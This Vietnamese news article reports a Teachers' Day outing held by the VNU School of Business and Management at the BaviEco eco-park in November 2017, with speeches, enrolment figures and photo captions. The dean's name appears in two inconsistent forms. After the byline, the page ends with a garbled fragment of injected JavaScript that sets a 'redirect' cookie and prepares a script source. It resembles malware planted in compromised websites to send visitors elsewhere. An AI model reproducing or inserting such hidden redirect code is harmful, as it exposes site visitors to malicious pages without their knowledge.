Anh-ngoai-troi-1Khoa Quản trị và Kinh doanh tổ chức Hiến chương các nhà giáo và các CBCNV của Khoa tại Khu sinh thái BaviEco.

 

Ngày 16/11/2017, toàn bộ Giảng viên, CBCNV cùng học viên của khoa Quản trị và Kinh doanh (HSB) – ĐHQG HN đã có một ngày dã ngoại thật đặc biệt, chào mừng ngày Hiến chương Nhà giáo Việt Nam 20/11.
Tham dự buổi dã ngoại và mit tinh có những người Thầy đã gắn bó từ ngày đầu mở đề án các chương trình thạc sĩ của HSB đến những giảng viên trẻ đang góp sức làm nên bản sắc riêng của Khoa quản trị và Kinh doanh, như: Thượng tướng,TS.Nguyễn Văn Hưởng – nguyên là Thứ trưởng Bộ Công an; Thiếu tướng, chuyên gia Nguyễn Đức Hiệt; PGS.TS Hoàng Đình Phi; PGS.TS.Nguyễn Ngọc Thắng; TS.Phạm Văn Hồng; Ths.Nguyễn Minh Tân; Ths.Đoàn Hữu Cảnh…

Anh-ngoai-troi-1
Phát biểu tại buổi lễ chào mừng, Thượng tướng, TS.Nguyễn Văn Hưởng nhớ lại: “Đây là năm thứ 3 tôi được tham dự buổi lễ Hiến chương Nhà giáo tại Khoa Quản trị và Kinh doanh, cảm giác lần nào cũng đầm ấm, vui vẻ, đoàn kết. Xin chúc các thầy cô giáo của HSB luôn luôn mang lại những kiến thức mới mẻ cho học viên, tiếp cận được thực tiễn cuộc sống để mang đến cho bài giảng hơi thở cuộc sống, nhất là thực tiễn trong quản trị và kinh doanh. Hơn nữa, giảng viên còn xây dựng và truyền đạt được giá trị đạo đức nghề nghiệp cho các học viên của mình.
Tôi đã có hơn 50 năm làm sĩ quan chuyên nghiệp, và may mắn được đóng góp công sức vào ngành giáo dục với hơn 3 năm làm việc tại Khoa Quản trị và Kinh doanh, nhưng cũng đã cảm nhận được sự mới mẻ của nghề giáo. Xin cảm ơn các thầy trong ĐHQGHN và Khoa Quản trị và Kinh doanh đã cho tôi may mắn đó và cơ hội được làm việc, đóng góp công sức của mình”.

Anh-trong-nha-3

Thượng tướng, TS.Nguyễn Văn Hưởng xúc động nhớ lại thời gian đứng trên bục giảng của HSB
Cũng theo Thượng tướng, TS.Nguyễn Văn Hưởng, trong thời gian qua, Khoa Quản trị và Kinh doanh đã đi đúng hướng và đáp ứng được nhu cầu của xã hội trong việc đào tạo nhân sự chất lượng cao trong lĩnh vực kinh doanh và quản trị các nội dung liên ngành, đặc biệt là vấn đề quản trị an ninh phi truyền thống.
Thay mặt Khoa Quản trị và Kinh doanh, PGS.TS.Hoàng Đình Phi – Chủ nhiệm Khoa đã gửi lời cảm ơn trân trọng tới các chuyên gia, các giảng viên cơ hữu, giảng viên thỉnh giảng đã – đang và sẽ luôn ủng hộ mạnh mẽ cho sự phát triển bền vững của Khoa Quản trị và Kinh doanh, hơn nữa đã luôn luôn yêu trò và tâm huyết, gắn bó với nghề.

PGS.TS.Nguyễn Đình Phi cho biết, mỗi năm HSB đào tạo mới gần 200 học viên thạc sĩ; tổ chức từ 300 đến 500 khóa học ngắn hạn cho các Tập đoàn, các tổ chức kinh tế lớn với hơn 5.000 học viên. Các đối tác chiến lược của HSB bao gồm: Tập đoàn Viễn thông Quân đội Viettel, Tập đoàn Sam Sung, TCT Sông Đà, TCT bia rượu nước giải khát Hà Nội Habeco, Tập đoàn Điện lực…Những con số đó đã nói lên giá trị thương hiệu trong đào tạo nhân sự chất lượng cao mà HSB đã làm được trong những năm qua.

Thay-Phi

PGS.TS.Nguyễn Đình Phi trân trọng gửi lời cảm ơn tới toàn thể Giảng viên, CBCNV của HSB nhân ngày Hiến chương Nhà giáo Việt Nam
Giữa núi rừng hùng vĩ đan xen cùng khung cảnh nhà sàn thơ mộng, mỗi chúng tôi đều cảm nhận được sự chăm chút, tận tâm mà PGS.TS.Hoàng Đình Phi – người thầy đang chèo lái con thuyền HSB đã dành cho ngôi nhà BaviEco cũng như Khoa Quản trị và Kinh doanh.
Và những lời chúc, những món quà chính là tấm tình mà HSB muốn dành tặng để tri ân những thầy cô, các cán bộ của Khoa nhân ngày Hiến chương Nhà giáo VN!

Dưới đây là một số hình ảnh về buổi lễ Hiến chương Nhà giáo Việt Nam của KHoa Quản trị và Kinh doanh tại khu sinh thái BaviEco:

Anh-tap-the ngoai-vuon-1

Anh-tap-the ngoai-vuon-2

Anh-tap-the ngoai-vuon

Anh-trong-nha-1

Anh-trong-nha-2

Anh-trong-nha-7

Anh-trong-nha-8

Anh-trong-nha-9
                                                                                                  Thùy Dung

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}